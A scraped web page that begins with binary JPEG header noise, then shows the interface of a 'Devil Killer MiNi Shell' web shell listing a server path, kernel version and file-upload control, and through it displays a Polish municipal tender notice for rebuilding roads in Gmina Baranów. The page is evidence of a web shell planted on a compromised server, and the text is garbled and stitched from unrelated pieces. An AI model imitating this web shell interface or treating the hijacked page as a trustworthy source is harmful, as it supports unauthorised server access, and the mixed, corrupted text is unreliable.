JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230221/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230221/0010312801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg gminnych na obszarze Gminy Baranów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Baranów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019891</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Baranów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-105</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81 883 40 27</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">81 883 40 41</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@gminabaranow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.gminabaranow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg gminnych na obszarze Gminy Baranów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-50fd544a-afc9-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00103128</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00006623/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa dróg gminnych na obszarze Gminy Baranów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-50fd544a-afc9-11ed-9236-36fed59ea7dd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl; gmina@gminabaranow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>5. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>6. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań, zawiadomień i zadawanie pytań oraz udzielania odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>7. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>8. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>10. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia, szczególności:<br/>1) W celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest:<br/>a) Komputer PC:<br/> parametry minimum: Intel Core2 Duo, 2 GB RAM, HD,<br/> zainstalowany jedne z poniższych systemów operacyjnych: MS Windows 7 lub nowszy, OSX/Mac OS 10.10, Ubuntu 14.04,<br/> zainstalowana jedna z poniższych przeglądarek: Chrome 66.0 lub nowsza, Firefox 59.0 lub nowszy, Safari 11.1 lub nowsza, Edge 14.0 i nowsze,<br/>albo<br/>b) Tablet/Telefon:<br/> parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0 Marshmallow, iOS 10.3,<br/> przeglądarka Chrome 61 lub nowa<br/>2) Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu bezpiecznej transmisji danych SSL, obsługi Java Script, oraz cookies;<br/>3) Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania<br/>i oznaczania czasu odbioru danych:<br/>a) specyfikacja połączenia – formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>b) format danych oraz kodowanie: formularze dostępne są w formacie HTML<br/>z kodowaniem UTF-8,<br/>c) oznaczenia czasu odbioru danych: wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do sekundy.<br/>11. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Administratorem danych osobowych jest:<br/>GMINA BARANÓW<br/>UL. RYNEK 14<br/>24-105 BARANÓW<br/>Tel.: 81 883 40 27<br/>2) Inspektor ochrony danych osobowych w Urzędzie Gminy Barnów, adres e-mail: inspektor@cbi24.pl<br/>3) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celach związanych z postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji.<br/>4) odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. ustawy Pzp.<br/>5) dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6) obowiązek podania danych osobowych bezpośrednio dotyczących osób fizycznych (w szczególności osób fizycznych skierowanych do realizacji zamówienia, podwykonawcy oraz podmiotu trzeciego będącego osobą fizyczną, osób fizycznych prowadzących jednoosobową działalność gospodarczą, pełnomocnika podwykonawcy oraz podmiotu trzeciego będącego osobą fizyczną, np. dane osobowe zamieszczone w pełnomocnictwie, członka organu zarządzającego oraz podmiotu będącego osobą fizyczną), jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7) w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8) osoby fizyczne posiadają:<br/>a) Na podstawie art. 15 RODO prawo dostępu do danych osobowych ich dotyczących.<br/>b) na podstawie art. 16 RODO prawo do sprostowania danych osobowych. Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, w przypadku uznania, że przetwarzanie danych osobowych narusza przepisy RODO.<br/>9) nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO.<br/>b) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz pkt 3.15 RODO (obowiązek informacyjny).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SG.271.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Przebudowa dróg gminnych na obszarze Gminy Baranów” <br/>o łącznej długości 15,503 km.<br/>3. Zakres robót obejmuje:<br/>Zadanie 1 – Przebudowa drogi nr 107425L w Baranowie.<br/>Odcinek drogi o długości 326,0 m:<br/>	wykonanie warstwy dolnej podbudowy z kruszywa o grubości 15 cm i szerokości 4,5 m;<br/>	wykonanie górnej warstwy podbudowy z kruszywa o grubości 10 cm i szerokości 4,3 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 4,1 m,<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 4,0 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 2 – Przebudowa drogi nr 107408L w Baranowie.<br/>Odcinek drogi o długości 250,2 m:<br/>	wykonanie poszerzeń istniejącej nawierzchni kruszywem;<br/>	wykonanie podbudowy wyrównawczej z kruszywa o średniej grubości 15 cm i szerokości 3,8 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 3 – Przebudowa drogi nr 124058L w Baranowie.<br/>Odcinek drogi o długości 319,0 m:<br/>	wykonanie warstwy dolnej podbudowy z kruszywa o grubości 15 cm i szerokości 4,0 m;<br/>	wykonanie górnej warstwy podbudowy z kruszywa o grubości 10 cm i szerokości 3,8 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 4 – Przebudowa drogi nr 107404L w Baranowie.<br/>Odcinek drogi o długości 388,4 m:<br/>	rozebranie istniejących krawężników i ustawienie nowych;<br/>	wykonanie warstwy wyrównawczo-wiążącej z betonu asfaltowego o średniej grubości 3 cm i szerokości 5,0 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 5,0 m.<br/>Zadanie 5 – Przebudowa drogi nr 112817L w Niwie.<br/>Odcinek drogi o długości 1 104,0 m:<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o średniej grubości 3 cm i szerokości 5,1 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 5,0 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 6 – Przebudowa drogi nr 107412L w Woli Czołnowskiej.<br/>Odcinek drogi o długości 965,0 m:<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o średniej grubości 3 cm i szerokości 5,1 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 5,0 m;<br/>	wykonanie peronu przystankowego i montaż wiaty przystankowej;<br/>	montaż drogowych barier ochronnych na długości 238,0 m;<br/>	wykonanie poboczy z kruszywa o grubości 8 cm i szerokości 0,75 m.<br/>Zadanie 7 – Przebudowa drogi nr 112898L w Woli Czołnowskiej.<br/>Odcinek drogi o długości 551,4 m:<br/>	wykonanie poszerzeń istniejącej nawierzchni kruszywem;<br/>	wykonanie podbudowy wyrównawczej z kruszywa o średniej grubości 12 cm i szerokości 3,8 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 8 – Przebudowa drogi nr 107413L w Woli Czołnowskiej.<br/>Odcinek drogi o długości 656,5 m:<br/>	wykonanie poszerzeń istniejącej nawierzchni kruszywem;<br/>	wykonanie podbudowy wyrównawczej z kruszywa o średniej grubości 15 cm i szerokości 3,8 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 9 – Przebudowa drogi nr 107416L w Nowomichowskiej.<br/>Odcinek drogi o długości 813,3 m:<br/>	wykonanie poszerzeń istniejącej nawierzchni kruszywem;<br/>	wykonanie na długości 200,0 m podbudowy wyrównawczej z kruszywa o średniej grubości 10 cm i szerokości 3,8 m;<br/>	wykonanie na długości 813,3 m podbudowy wyrównawczej z kruszywa o średniej grubości 15 cm i szerokości 3,8 m<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 10 – Przebudowa drogi nr 112855L w Gródku.<br/>Odcinek drogi o długości 612,2 m:<br/>	wykonanie poszerzeń istniejącej nawierzchni kruszywem;<br/>	wykonanie podbudowy wyrównawczej z kruszywa o średniej grubości 15 cm i szerokości 3,8 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie 1 mijanki o szerokości 5,0 m i długości 25,0 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 11 – Przebudowa drogi nr 107409L w Składowie.<br/>Odcinek drogi o długości 527,0 m:<br/>	wykonanie poszerzeń istniejącej nawierzchni kruszywem;<br/>	wykonanie podbudowy wyrównawczej z kruszywa o średniej grubości 8 cm i szerokości 5,3 m na odcinku 244 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm na odcinku 244 m i 3 cm i odcinku 283 m (szerokość 5,1 m);<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 5,0 m na całym odcinku;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 12 – Przebudowa drogi na działce nr 633/3 w Śniadówce.<br/>Odcinek drogi o długości 481,2 m:<br/>	wykonanie podbudowy wyrównawczej z kruszywa o średniej grubości 12 cm na szerokości 3,8 m;<br/>	wykonanie warstwy wyrównawczo-wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 13 – Przebudowa drogi nr 112872L w Śniadówce.<br/>Odcinek drogi o długości 2 561,4 m:<br/>	wykonanie poszerzeń istniejącej nawierzchni kruszywem;<br/>	wykonanie podbudowy wyrównawczej z kruszywa o średniej grubości 15 cm i szerokości 3,3 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,1 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,0 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,5 m.<br/>Zadanie 14 – Przebudowa drogi nr 107420L w Karczunku i Łukawce.<br/>Odcinek drogi o długości 1 449,5 m:<br/>	wykonanie podbudowy wyrównawczej z kruszywa o średniej grubości 12 cm i szerokości 3,8 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	ustawienie barier U-12a na obiekcie mostowym;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 15 – Przebudowa drogi nr 112989L w Łukawce.<br/>Odcinek drogi o długości 520,0 m:<br/>	wykonanie poszerzeń istniejącej nawierzchni kruszywem;<br/>	wykonanie podbudowy wyrównawczej z kruszywa o średniej grubości 15 cm i szerokości 3,8 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 16 – Przebudowa drogi nr 107417L w Zagoździu.<br/>Odcinek drogi o długości 806,5 m:<br/>	wykonanie dolnej warstwy podbudowy z kruszywa o grubości 15 cm i szerokości 4,0 m na długości 730,0m;<br/>	wykonanie górnej warstwy podbudowy z kruszywa o grubości 10 cm i szerokości 3,8 m na długości 730,0m;<br/>	wykonanie warstwy podbudowy wyrównawczej z kruszywa o grubości 8 cm i szerokości 3,8 m na długości 76,0m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 17 – Przebudowa drogi nr 124114L i 124087L w Pogonowie.<br/>Odcinek drogi o długości 475,2 m:<br/>	wykonanie dolnej warstwy podbudowy z kruszywa o grubości 15 cm i szerokości 4,0 m;<br/>	wykonanie górnej warstwy podbudowy z kruszywa o grubości 10 cm i szerokości 3,8 m;<br/>	wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm i szerokości 3,6 m;<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm i szerokości 3,5 m;<br/>	wykonanie poboczy z kruszywa o grubości 10 cm i szerokości 0,75 m.<br/>Zadanie 18 – Przebudowa drogi nr 107415L w Koźle.<br/>Odcinek drogi o długości 586,2 m:<br/>	wykonanie dolnej warstwy podbudowy z kruszywa o grubości 15 cm i szerokości 5,5 m 